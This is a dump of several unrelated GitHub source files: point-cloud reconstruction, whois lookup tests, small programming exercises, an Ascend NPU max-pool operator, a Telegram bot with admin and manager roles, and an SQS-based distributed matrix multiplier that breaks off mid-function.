self._registerPairCloud(source=self.origionData[index],\n target=targetCloud)\n targetCloud += self.origionData[index].transform(reg.transformation)\n targetCloud = targetCloud.voxel_down_sample(self.p['voxelSize'])\n o3d.io.write_point_cloud(f'index={index}.pcd', targetCloud)\n print(f\"Index = {index}\\t,Fitness = {reg.fitness}\")\n return targetCloud\n\n\n\"\"\"\n第二个数据集Voxel 取0.05比较好\n\n\"\"\"\n","repo_name":"he20010515/open3d_Reconstruction","sub_path":"src/ReconstructionSystem.py","file_name":"ReconstructionSystem.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74375845608","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nfrom nose.tools import *\nfrom nose.plugins.skip import SkipTest\nfrom ip2org import whois, ip2org\n\n\n@raises(ValueError)\ndef test_no_domains():\n # This should raise ValueError because\n # ip2org doesn't support domain search.\n whois(\"google.com\")\n\n\n@raises(ValueError)\ndef test_invalid_ip():\n # This also should raise ValueError because the given\n # IP address is invalid.\n ips = [\"256.0.0.0\", \"0.256.0.0\", \"0.0.256.0\", \"0.0.0.256\"]\n whois(*ips)\n\n\n@raises(ValueError)\ndef test_range():\n # ip range with /XX is not desired.\n ip = \"192.168.100.0/24\"\n whois(ip)\n\n\ndef test_empty():\n result = whois()\n assert_equal(len(result), 0, \"The length of reuslt should be 0\")\n\n\ndef test_google():\n # Google IP Addresses are managed by arin.\n ip = [\n \"173.194.38.0\", \"173.194.38.1\", \"173.194.38.2\", \"173.194.38.3\",\n \"173.194.38.4\", \"173.194.38.5\", \"173.194.38.6\", \"173.194.38.7\",\n \"173.194.38.8\", \"173.194.38.9\", \"173.194.38.14\"\n ]\n\n result = whois(*ip)\n assert_equal(len(result), len(ip),\n \"The number of the result should be the same of the # of ips.\"\n )\n\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n origin_list = list(map(lambda e: e.get(\"whois\"), result))\n for name in orgnames:\n assert_equal(name, \"Google Inc. (GOGL)\",\n \"name should be Google Inc. 
(GOGL).\")\n for origin in origin_list:\n assert_equal(origin, \"arin\", \"origin should be arin\")\n\n\ndef test_apnic():\n apnic = [\"27.114.150.10\", \"27.114.150.11\", \"27.114.150.12\"]\n result = whois(*apnic)\n from pprint import pprint\n pprint(result)\n assert_equal(len(result), len(apnic),\n \"The number of result should be the same of the # of asia.\"\n )\n\n origin_list = list(map(lambda e: e.get(\"whois\"), result))\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n for origin in origin_list:\n assert_equal(origin, \"apnic\", \"origin should be apnic\")\n\n for name in orgnames:\n assert_equal(name,\n \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\",\n (\"name should be\"\n \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\"))\n\n\ndef test_afrinic():\n afrinic = [\"146.231.129.86\", \"41.248.247.207\",\n \"146.231.129.81\", \"197.80.150.123\"]\n organizations = [\n \"Rhodes University\", None, \"Rhodes University\",\n \"MWEB CONNECT (PROPRIETARY) LIMITED\"\n ]\n result = whois(*afrinic)\n origin_list = list(map(lambda e: e.get(\"whois\"), result))\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n for origin in origin_list:\n assert_equal(origin, \"afrinic\", \"origin should be afrinic\")\n\n assert_list_equal(orgnames, organizations)\n\n\ndef test_lacnic():\n lanic = [\n \"200.89.75.197\", \"200.89.75.198\",\n \"190.15.141.64\", \"200.1.19.4\"\n ]\n organizations = [\n \"Universidad de Chile\",\n \"Universidad de Chile\",\n \"CEDIA\",\n \"Universidad Tecnica Federico Santa Maria\"\n ]\n result = whois(*lanic)\n origin = set(list(map(lambda el: el.get(\"whois\"), result)))\n assert_equal(len(origin), 1)\n assert_list_equal(list(origin), [\"lancic\"])\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n assert_list_equal(orgnames, organizations)\n\n\ndef test_ripe():\n ripe = [\n \"5.34.248.224\", \"94.23.166.108\",\n \"213.95.21.43\", \"188.138.75.207\"\n ]\n organizations = [\n \"Newsnet AG\",\n \"OVH GmbH\",\n None,\n None\n ]\n result = whois(*ripe)\n origin = set(list(map(lambda el: el.get(\"whois\"), result)))\n assert_equal(len(origin), 1)\n assert_list_equal(list(origin), [\"ripe\"])\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n assert_list_equal(orgnames, organizations)\n\n\n@raises(NotImplementedError)\ndef test_rwhois_ntt():\n ntt = [\"204.0.0.2\", \"204.1.1.25\"]\n whois(*ntt)\n\n\n@raises(ValueError)\ndef test_twnic():\n twnic = [\"202.39.128.5\", \"202.39.238.192\"]\n whois(*twnic)\n\n\ndef test_jpnic():\n jpnic = [\"211.120.0.3\", \"211.130.5.1\", \"211.125.255.230\"]\n organizations = [\n \"Yahoo Japan Corporation\",\n \"F Bit Communications Corp.\",\n \"Oita Cable Telecom Co,.Ltd.\"\n ]\n result = whois(*jpnic)\n origin = set(list(map(lambda el: el.get(\"whois\"), result)))\n assert_equal(len(origin), 1)\n assert_list_equal(list(origin), [\"whois.nic.ad.jp\"])\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n assert_list_equal(orgnames, organizations)\n\n\n@raises(ValueError)\ndef test_brnic():\n brnic = [\"200.17.0.5\"]\n whois(*brnic)\n\n\ndef test_krnic():\n krnic = [\"222.122.0.5\", \"222.122.10.30\", \"222.122.130.45\"]\n organizations = [\n \"Korea Telecom\",\n \"Korea Telecom\",\n \"Korea Telecom\"\n ]\n\n result = whois(*krnic)\n origin = set(list(map(lambda el: el.get(\"whois\"), result)))\n assert_equal(len(origin), 1)\n assert_list_equal(list(origin), [\"whois.nic.or.kr\"])\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n assert_list_equal(orgnames, 
organizations)\n\n\ndef test_ip2org():\n expected_data = [\n [\"173.194.38.0\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.1\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.2\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.3\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.4\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.5\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.6\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.7\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.8\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.9\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"173.194.38.14\", \"Google Inc. (GOGL)\", \"GOOGLE\"],\n [\"27.114.150.10\", \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\",\n \"DHIVEHINET\"],\n [\"27.114.150.11\", \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\",\n \"DHIVEHINET\"],\n [\"27.114.150.12\", \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\",\n \"DHIVEHINET\"],\n [\"146.231.129.86\", \"Rhodes University\", \"RHODENT2\"],\n [\"41.248.247.207\", \"\", \"IP_Static_MarocTelecom\"],\n [\"146.231.129.81\", \"Rhodes University\", \"RHODENT2\"],\n [\"197.80.150.123\", \"MWEB CONNECT (PROPRIETARY) LIMITED\",\n \"MWEB-NET-197-80-150-0\"],\n [\"200.89.75.197\", \"Universidad de Chile\", \"\"],\n [\"200.89.75.198\", \"Universidad de Chile\", \"\"],\n [\"190.15.141.64\", \"CEDIA\", \"\"],\n [\"200.1.19.4\", \"Universidad Tecnica Federico Santa Maria\", \"\"],\n [\"5.34.248.224\", \"Newsnet AG\", \"LI-NEWSNETAG-HOSTING\"],\n [\"94.23.166.108\", \"OVH GmbH\", \"DE-OVH\"],\n [\"213.95.21.43\", \"\", \"NORIS-STAFF-HOUSING-NET\"],\n [\"188.138.75.207\", \"\", \"BSB-Service-1\"],\n [\"211.120.0.3\", \"Yahoo Japan Corporation\", \"\"],\n [\"211.130.5.1\", \"F Bit Communications Corp.\", \"FBT-08-00001\"],\n [\"211.125.255.230\", \"Oita Cable Telecom Co,.Ltd.\", \"OCT-NET\"],\n [\"222.122.0.5\", \"Korea Telecom\", \"KORNET\"],\n [\"222.122.10.30\", \"Korea Telecom\", \"KORNET\"],\n [\"222.122.130.45\", \"Korea Telecom\", \"KORNET\"]\n ]\n\n result_file = \"test_ip2org_result.csv\"\n ip2org(\"tests/data/ips\", result_file)\n\n result = list()\n with open(result_file) as fin:\n import csv\n result = list(csv.reader(fin))\n\n assert_list_equal(result, expected_data, \"Unexpected result\")\n","repo_name":"hiroaki-yamamoto/gcm-sec-exam","sub_path":"tests/spec_ip2org.py","file_name":"spec_ip2org.py","file_ext":"py","file_size_in_byte":7568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15460383580","text":"angka = input(\"masukan list angka: \").split()\nangka = [int(i) for i in angka]\ntarget = int(input(\"masukan angka target: \"))\ndef sekali(a, t):\n output = []\n for i in a:\n for j in a:\n if (i + j == t) and (a.index(i) != a.index(j)):\n output.extend([a.index(i),a.index(j)])\n return output\nprint(\"kombinasi angkanya adalah :\",sekali(angka, target))\n\n","repo_name":"Rina14/Interaction-Design","sub_path":"soal2_2.py","file_name":"soal2_2.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"id","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9424015508","text":"#!/usr/bin/env python3\n\n'''\nBattleStar written by Michael Weinstein, 2016\nUniversity of California, Los Angeles, Daniel Cohn laboratory and Collaboratory\nemail: [myfirstname].[mylastname] AT ucla.edu\n'''\n\nglobal pythonInterpreterAbsolutePath\npythonInterpreterAbsolutePath = \"/u/local/apps/python/3.4.3/bin/python3\"\n\nclass CheckArgs(): 
#class that checks arguments and ultimately returns a validated set of arguments to the main program\n \n def __init__(self):\n import argparse\n import os\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--tempdir\", help = \"Force the program to try using a temporary directory. The directory should not already exist.\")\n parser.add_argument(\"-v\", \"--verbose\", help = \"Run in verbose mode (indicate progress, etc.)\", action = 'store_true')\n parser.add_argument(\"-f\", \"--fileList\", help = \"List of files to operate on, separated by commas\")\n rawArgs = parser.parse_args()\n if not rawArgs.tempdir:\n raise RuntimeError(\"A temporary directory must be passed as an argument. None was found.\")\n if rawArgs.tempdir:\n if not os.path.isdir:\n raise RuntimeError(\"Specified temporary directory was not found. \" + rawArgs.tempdir)\n self.tempdir = rawArgs.tempdir\n else:\n raise RuntimeError(\"A temporary directory argument must be passed, but none was seen.\")\n self.verbose = rawArgs.verbose\n fileList = rawArgs.fileList\n if not fileList:\n raise RuntimeError(\"No file list given, nothing to operate on.\")\n self.fileList = fileList.split(\",\")\n\ndef addDataFromFile(file):\n import os\n import pickle\n if not os.path.isfile(file):\n raise RuntimeError(\"Tried to open data file, but it does not exist. \" + file)\n inputFile = open(file,'rb')\n #if args.verbose:\n #print(\"Loading pickle\")\n data = pickle.load(inputFile)\n inputFile.close()\n #if args.verbose:\n #print(\"Loaded pickle.\")\n for key in list(data.keys()):\n #if args.verbose:\n # print(\"Key: \" + key + \":\" + str(len(data[key])))\n combinedData[key] = data[key]\n\ndef main():\n import datetime\n import os\n import pickle\n import random\n start = datetime.datetime.now()\n global args\n args = CheckArgs()\n global combinedData\n combinedData = {}\n progress = 0\n for file in args.fileList:\n if args.verbose:\n print(\"Added data from \" + str(progress) + \" of \" + str(len(args.fileList)) + \" files. \", end = \"\\r\")\n addDataFromFile(file)\n progress += 1\n if args.verbose:\n print(\"Added data from all \" + str(len(args.fileList)) + \" files. 
\")\n outputFileName = args.tempdir + os.sep + \"finalParts\" + os.sep + args.fileList[0].split(os.sep)[-1] +\".andFriends.scatter.pkl\"\n outputFile = open(outputFileName, 'wb')\n pickle.dump(combinedData, outputFile)\n outputFile.close()\n if args.verbose:\n runtime = datetime.datetime.now() - start\n print(\"Partial build process complete in \" + str(runtime))\n \nmain()\n ","repo_name":"michael-weinstein/BattleStar","sub_path":"baseStar.py","file_name":"baseStar.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24936500336","text":"gifts = input()\ngifts_list = gifts.split(\" \")\nlast_gift_index = len(gifts_list) - 1\n\nwhile True:\n command = input()\n\n if command == \"No Money\":\n break\n\n command_list = command.split(\" \")\n\n if \"OutOfStock\" in command:\n for i in range(len(gifts_list)):\n if gifts_list[i] == command_list[1]:\n gifts_list[i] = \"None\"\n\n elif \"Required\" in command:\n if 0 <= int(command_list[2]) <= last_gift_index:\n replace_index = int(command_list[2])\n gifts_list[replace_index] = command_list[1]\n\n elif \"JustInCase\" in command:\n gifts_list[last_gift_index] = command_list[1]\n\nfor gift_no in range(len(gifts_list)):\n if gifts_list[gift_no] == \"None\":\n continue\n\n print(gifts_list[gift_no], end=\" \")\n","repo_name":"Polishko/SoftUni","sub_path":"Python Fundamentals/Exercises/Exercise_3/qu_7.py","file_name":"qu_7.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9350575887","text":"n = int(input())\na = list(map(int, input().split()))\na0 = a[0]\na = sorted(a[1:])\ncnt = 0\nwhile a0 <= a[-1]:\n cnt += 1\n a0 += 1\n a[-1] -= 1\n a.sort()\nprint(cnt)","repo_name":"vchilikov/Olimp","sub_path":"574A.py","file_name":"574A.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17512129930","text":"import numpy as np\n\n\ndef compute_cross_entropy_loss(expected, result):\n assert(expected.shape[1] == result.shape[1])\n size = expected.shape[1]\n\n loss = (-1. / size) * (\n np.sum(np.multiply(expected, np.log(result)))\n + np.sum(np.multiply((1 - expected), np.log(1 - result)))\n )\n\n return loss\n","repo_name":"Lenferd/deep-learning-course","sub_path":"Lab 1/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8643982826","text":"from __future__ import absolute_import\n\nimport te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te.utils.op_utils import *\n\n\n# pylint: disable=locally-disabled,unused-argument\n# pylint: disable=too-many-arguments,unnecessary-lambda\n@fusion_manager.register(\"max_pool_ext2\")\ndef max_pool_ext2_compute(input_data, output_data, ksize, strides, padding,\n data_format=\"NC1HWC0\", is_fused_compute=True,\n kernel_name=\"max_pool\"):\n \"\"\"\n Performs max_pool_ext2 on the input.\n\n Parameters\n ----------\n input_data: TVM tensor\n A `Tensor`. Must be one of the following types: `float16`,\n `uint8`, `int8`. 
5-D input to pool over.\n output_data: dict\n dict of output_data, include keys(shape and dtype).\n ksize: list or tuple\n A list of `ints` that has length 4.\n The size of the window for each dimension of the input tensor.\n strides: list or tuple\n A list of `ints` that has length 4.\n The stride of the sliding window for each dimension of the input tensor.\n padding: str\n A `string` from: \"SAME\", \"VALID\".The type of padding algorithm to use.\n data_format: str\n A `string` from: \"NC1HWC0\", \"NHWC\", \"NCHW\".\n kernel_name: str\n kernel name, default value is 'max_pool'\n\n Returns:\n -------\n res: TVM tensor\n output tensor. Has the same type as `input_data`.\n \"\"\"\n if data_format in (\"NHWC\",):\n window_h, window_w = ksize[1], ksize[2]\n stride_h, stride_w = strides[1], strides[2]\n else:\n window_h, window_w = ksize[2], ksize[3]\n stride_h, stride_w = strides[2], strides[3]\n\n # l1 fusion params assign\n # 0: L1 depth fusion, 1: L1 width fusion, -1: no L1 fusion\n l1_fusion_type = input_data.op.attrs[\"L1_fusion_type\"].value \\\n if \"L1_fusion_type\" in input_data.op.attrs else -1\n in_l1_flag = input_data.op.attrs[\"addr_type\"].value == 1 \\\n if \"addr_type\" in input_data.op.attrs else False\n in_valid_shape = input_data.op.attrs[\"valid_shape\"] \\\n if \"valid_shape\" in input_data.op.attrs else []\n in_slice_offset = input_data.op.attrs[\"slice_offset\"] \\\n if \"slice_offset\" in input_data.op.attrs else []\n in_select_read_flag = bool(in_valid_shape)\n in_split_index = input_data.op.attrs[\"split_index\"].value \\\n if \"split_index\" in input_data.op.attrs else 0\n out_l1_flag = output_data.get(\"addr_type\") == 1\n fusion_params = {\"is_fused_compute\": is_fused_compute,\n \"l1_fusion_type\": l1_fusion_type,\n \"in_l1_flag\": in_l1_flag,\n \"out_l1_flag\": out_l1_flag,\n \"in_select_read_flag\": in_select_read_flag,\n \"in_split_index\": in_split_index,\n \"in_slice_offset\": in_slice_offset,\n \"in_valid_shape\": in_valid_shape}\n\n if in_select_read_flag:\n select_tensor_in = tvm.compute(in_valid_shape,\n lambda n, c1, h, w, c0:\n input_data(n, c1, h +\n in_slice_offset[2], w, c0),\n name=\"tensor_read_select\",\n attrs=input_data.op.attrs)\n res = te.lang.cce.pooling2d(select_tensor_in, (window_h, window_w),\n (stride_h, stride_w),\n \"MAX\", padding, pad=(0, 0, 0, 0),\n fusion_params=fusion_params)\n elif l1_fusion_type == 1:\n input_data.op.attrs[\"addr_type\"].value = 1\n in_l1_flag = True\n fusion_params[\"in_l1_flag\"] = in_l1_flag\n\n l1_width_fusion_in = tvm.compute(input_data.shape,\n lambda n, c1, h, w, c0:\n input_data(n, c1, h, w, c0),\n name=\"l1_width_fusion_tensor_in\",\n attrs=input_data.op.attrs)\n res = te.lang.cce.pooling2d(l1_width_fusion_in, (window_h, window_w),\n (stride_h, stride_w), \"MAX\", padding,\n pad=(0, 0, 0, 0),\n fusion_params=fusion_params)\n else:\n res = te.lang.cce.pooling2d(input_data, (window_h, window_w),\n (stride_h, stride_w),\n \"MAX\", padding, pad=(0, 0, 0, 0),\n fusion_params=fusion_params)\n\n return res\n\n\n@check_op_params(REQUIRED_INPUT, REQUIRED_OUTPUT, REQUIRED_ATTR_LIST_INT, REQUIRED_ATTR_LIST_INT,\n REQUIRED_ATTR_STR, OPTION_ATTR_STR, KERNEL_NAME)\ndef max_pool_ext2(input_data, output_data, ksize, strides, padding,\n data_format=\"NC1HWC0\", kernel_name=\"max_pool_ext2\"):\n \"\"\"\n Performs max pooling ext2 on the input.\n\n Parameters\n ----------\n input_data: dict\n dict of input_data, include keys(shape and dtype).\n output_data: dict\n dict of output_data, include keys(shape and dtype).\n 
ksize: list or tuple\n A list of `ints` that has length 4.\n The size of the window for each dimension of the input tensor.\n strides: list or tuple\n A list of `ints` that has length 4.\n The stride of the sliding window for each dimension of the input tensor.\n padding: str\n A `string` from: `\"SAME\", \"VALID\"`.The type of padding algorithm to use.\n data_format: str\n A `string` from: `\"NC1HWC0\", \"NHWC\", \"NCHW\"`.\n kernel_name: str\n kernel name, default value is 'max_pool'\n\n Returns:\n -------\n None\n \"\"\"\n input_shape = input_data.get(\"shape\")\n input_dtype = input_data.get(\"dtype\").lower()\n\n check_shape(input_shape, param_name=\"input_data\")\n\n check_list = (\"float16\", \"int8\", \"uint8\")\n check_dtype(input_dtype, check_list, param_name=\"input_data\")\n\n if data_format in (\"NHWC\",):\n if len(ksize) != 4:\n raise RuntimeError(\"Invalid ksize params, ksize dim must be 4.\")\n if ksize[0] != 1 or ksize[3] != 1:\n raise RuntimeError(\"MaxPool only supports pooling across\"\n \"width/height, and other ksize dimension\"\n \"should be one\")\n if len(strides) != 4:\n raise RuntimeError(\"Invalid strides params, strides dim must be 4.\")\n if strides[0] != 1 or strides[3] != 1:\n raise RuntimeError(\"MaxPool only supports pooling across\"\n \"width/height, and other strides dimension\"\n \"should be one\")\n elif data_format in (\"NC1HWC0\", \"NCHW\"):\n if len(ksize) != 4:\n raise RuntimeError(\"Invalid ksize params, ksize dim must be 4.\")\n if ksize[0] != 1 or ksize[1] != 1:\n raise RuntimeError(\"MaxPool only supports pooling across\"\n \"width/height, and other ksize dimension\"\n \"should be one\")\n if len(strides) != 4:\n raise RuntimeError(\"Invalid strides params, strides dim must be 4.\")\n if strides[0] != 1 or strides[1] != 1:\n raise RuntimeError(\"MaxPool only supports pooling across\"\n \"width/height, and other strides dimension\"\n \"should be one\")\n else:\n raise RuntimeError(\"The data_format is not supported\")\n\n if padding not in (\"SAME\", \"VALID\"):\n raise RuntimeError(\"MaxPool can only support SAME or VALID\"\n \"padding mode.\")\n\n # set tensor attrs, during L1 fusion these attrs will assign by te_fusion\n addr_type = input_data.get(\"addr_type\", 0)\n valid_shape = input_data.get(\"valid_shape\", [])\n slice_offset = input_data.get(\"slice_offset\", [])\n split_index = input_data.get(\"split_index\", 0)\n l1_fusion_type = input_data.get(\"L1_fusion_type\", -1)\n attr = {\"addr_type\": addr_type,\n \"valid_shape\": valid_shape,\n \"slice_offset\": slice_offset,\n \"split_index\": split_index,\n \"L1_fusion_type\": l1_fusion_type}\n is_l1fusion = l1_fusion_type in (0, 1)\n\n data_input = tvm.placeholder(input_shape, name=\"data_input\",\n dtype=input_dtype, attrs=attr)\n\n res = max_pool_ext2_compute(data_input, output_data, ksize, strides,\n padding, data_format=data_format,\n is_fused_compute=False,\n kernel_name=kernel_name)\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n config = {\n \"name\": kernel_name,\n \"tensor_list\": [data_input, res],\n \"l1_fusion_option\": is_l1fusion}\n te.lang.cce.cce_build_code(sch, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/max_pool_ext2.py","file_name":"max_pool_ext2.py","file_ext":"py","file_size_in_byte":9014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15377432112","text":"# -*- coding: utf-8 -*-\nimport telebot\nfrom telebot import types\nimport config\nimport 
dbworker\n\nbot = telebot.TeleBot(config.TOKEN)\n\n# Начало диалога\n@bot.message_handler(commands=[\"start\"])\ndef cmd_start(message):\n # если /start написал авторизовавшийся пользователь\n if dbworker.get_current_state(message.chat.id) == config.States.AUTHORIZATED.value:\n # подключаемся к БД\n conn = dbworker.SQLighter()\n # Спрашиваем: это админ?\n answer = conn.is_admin(message.from_user.id)\n # закрываем подключение к базе\n conn.close()\n\n # если это одмен\n if answer:\n bot.send_message(message.from_user.id, \"Начнём работу, Администратор\")\n else:\n # не одмен\n bot.send_message(message.from_user.id, \"Начнём работу, Менаджер\")\n else:\n # /start написал НЕ авторизовавшийся пользователь\n bot.send_message(message.chat.id, \"Напиши кто ты по масти\")\n dbworker.set_state(message.chat.id, config.States.START_ENTER.value)\n\n# По команде /reset будем сбрасывать состояния, возвращаясь к началу диалога\n@bot.message_handler(commands=[\"reset\"])\ndef cmd_reset(message):\n bot.send_message(message.chat.id, \"Начнём с начала\")\n dbworker.set_state(message.chat.id, config.States.START_ENTER.value)\n\n# Обрабатывается в первом состоянии - когда нужно ввести admin или manager\n# Состояние - старт\n# обрабатывает любы сообщения можно настроить \n@bot.message_handler(func=lambda message: dbworker.get_current_state(message.chat.id) == config.States.START_ENTER.value)\ndef user_entering_name(message):\n if message.text == 'admin':\n bot.send_message(message.chat.id, \"Приветствую повелитель, но введи сначала пароль\")\n dbworker.set_state(message.chat.id, config.States.ENTER_PASSWOD.value)\n elif message.text == 'manager':\n bot.send_message(message.chat.id, \"Дарова роботяга! Введи имя организации\")\n dbworker.set_state(message.chat.id, config.States.ENTER_COMPANY.value)\n else:\n bot.send_message(message.chat.id, \"Введи 'admin' или 'manager'\")\n\n# Обрабатывается когда нужно ввести пароль\n@bot.message_handler(func=lambda message: dbworker.get_current_state(message.chat.id) == config.States.ENTER_PASSWOD.value)\ndef user_entering_password(message):\n if message.text == '12345678':\n # поключаемся к базе данных\n conn = dbworker.SQLighter()\n # Получаем ответ от БД\n answer = conn.add_admin(message.from_user)\n # закрываем соединение\n conn.close()\n\n if not answer:\n # пользователь уже есть в таблице админов\n bot.send_message(message.chat.id, \"Добро пожаловать снова\")\n else:\n # Новый админ\n bot.send_message(message.chat.id, \"Я записал тебя в список админов\")\n dbworker.set_state(message.chat.id, config.States.AUTHORIZATED.value)\n else:\n bot.send_message(message.chat.id, \"Неправильный пароль, попробуй снова\")\n\n# Обрабатывается когда нужно ввести имя компании\n@bot.message_handler(func=lambda message: dbworker.get_current_state(message.chat.id) == config.States.ENTER_COMPANY.value)\ndef user_work(message):\n # подключаемся к базе\n conn = dbworker.SQLighter()\n if not conn.add_manager(message.from_user, message.text):\n # пользователь уже есть в таблице админов\n # обновим его поля\n conn.update_manager(message.from_user, company=message.text)\n # Закрываем соединение\n conn.close()\n bot.send_message(message.chat.id, \"Имя компании успешно изменено\")\n else:\n # Новый менаджер\n bot.send_message(message.chat.id, \"Добро пожаловать на каторгу\")\n\n dbworker.set_state(message.chat.id, config.States.AUTHORIZATED.value)\n\n# Обрабатывается когда пользователь уже зарегестрирован\n# Пишем разные сообщения в зависимосты кто это\n# Тут обрабатываются пока текстовые 
сообщения, но это можно настроить\n@bot.message_handler(func=lambda message: dbworker.get_current_state(message.chat.id) == config.States.AUTHORIZATED.value)\ndef user_working(message):\n # подключаемся к базе\n conn = dbworker.SQLighter()\n # Спрашиваем: \"Это Одмен?\"\n answer = conn.is_admin(message.from_user.id)\n # Закрываем соединение с базой\n conn.close()\n\n # Если Админ можно зафигачить кастомную клавиатуру или тп\n if answer:\n bot.send_message(message.from_user.id, 'Адмен привет. Такое дело не пиши мне')\n else:\n # Не одмен\n bot.send_message(message.from_user.id, 'Манагер дарова. Иди работать, не пиши мне')\n\n\nif __name__ == \"__main__\":\n # bot.send_message(config.ADMIN_ID, 'Бот запущен')\n bot.infinity_polling()","repo_name":"VasiliySilver/DATA_BASE_bOT","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10799043986","text":"import boto3\nimport streamlit as st\nimport numpy as np\nfrom math import *\nimport ast\nimport time\nimport multiprocessing as mp\nfrom multiprocessing import shared_memory, Manager\nfrom botocore.config import Config\nfrom ctypes import c_char_p\n\n\ndef initSQS(QeueName):\n config = Config(\n region_name='us-east-1',\n signature_version='v4',\n retries={\n 'max_attempts': 10,\n 'mode': 'standard'\n }\n )\n\n # Get the service resource\n sqs = boto3.resource('sqs', config=config)\n\n # Get the queue\n queue = sqs.get_queue_by_name(QueueName=QeueName)\n\n return queue\n\n\ndef sendJob(message):\n # Create a new message\n response = queue_send.send_message(MessageBody=message)\n\n\ndef encodeMessageMaster(index, shape, m1, m2, isMultiplication):\n type = '0'\n\n if isMultiplication:\n type = '1'\n\n index_str = str(index)\n shape_str = str(shape)\n m1_str = str(m1.tolist())\n m2_str = str(m2.tolist())\n # m1_str = np.array_str(m1)\n # m2_str = np.array_str(m2)\n\n result = [type, index_str, shape_str, m1_str, m2_str]\n return '/'.join(result)\n\n\ndef decodeMessageMaster(message):\n messageRecv = message.split('/')\n\n index = ast.literal_eval(messageRecv[0])\n shape = ast.literal_eval(messageRecv[1])\n m_list = ast.literal_eval(messageRecv[2])\n m = np.array(m_list, dtype=int)\n\n return index, m\n\n\ndef generateMatrix(x, y):\n m1 = np.random.randint(0, 100, (x, y))\n return m1\n\n\ndef devideMatrix(M, subMatrixSize):\n l_sub_matrix = ceil(sqrt(subMatrixSize))\n\n # Define the necessary padding\n paddingX = (ceil(M.shape[1] / l_sub_matrix) * l_sub_matrix) - M.shape[1]\n paddingY = (ceil(M.shape[0] / l_sub_matrix) * l_sub_matrix) - M.shape[0]\n\n # Add a padding\n M = np.pad(M, ((0, paddingY), (0, paddingX)))\n\n # Devision of the matrix\n M = np.lib.stride_tricks.as_strided(M, shape=(\n int(M.shape[0] / l_sub_matrix), int(M.shape[1] / l_sub_matrix), l_sub_matrix, l_sub_matrix),\n strides=(M.shape[1] * l_sub_matrix, l_sub_matrix, M.shape[1], 1))\n\n return paddingX, paddingY, M\n\n\ndef processMessage(message_body, final_matrix, isMultiplication):\n index, m = decodeMessageMaster(message_body)\n\n if isMultiplication:\n final_matrix[index[0]][index[1]] += m\n else:\n final_matrix[index[0]][index[1]] = m\n\n\ndef getTotalToReceive(m1, m2, isMultiplication):\n if isMultiplication:\n total_to_receive = m1.shape[0] * m2.shape[0] * m1.shape[1]\n else:\n total_to_receive = m1.shape[0] * m1.shape[1]\n\n return total_to_receive\n\n\ndef sendMatrix(M1, M2, total, isMultiplication, string_placeholder):\n\n count = 
0\n\n if isMultiplication:\n index1 = [0, 0]\n index2 = [0, 0]\n\n for y2 in M2:\n for x1 in M1:\n index1[1] = 0\n index2[0] = 0\n for x, y in zip(x1, y2):\n sendJob(encodeMessageMaster([index1[0], index2[1]], np.shape(x), x, y.T, isMultiplication))\n count += 1\n string_placeholder.value = (f\"Total send: {count}/{total}\")\n index1[1] += 1\n index2[0] += 1\n index1[0] += 1\n index1[0] = 0\n index2[1] += 1\n\n else:\n index = [0, 0]\n\n for X1, X2 in zip(M1, M2):\n index[1] = 0\n for x1, x2 in zip(X1, X2):\n sendJob(encodeMessageMaster(index, np.shape(x1), x1, x2, isMultiplication))\n index[1] += 1\n index[0] += 1\n\ndef receiveMatrix(total_to_receive, final_matrix, isMultiplication, string_placeholder):\n number_receive = 0\n\n while number_receive < total_to_receive:\n messages = queue_receive.receive_messages()\n string_placeholder.value = (f\"Total received: {number_receive}/{total_to_receive}\")\n for message in 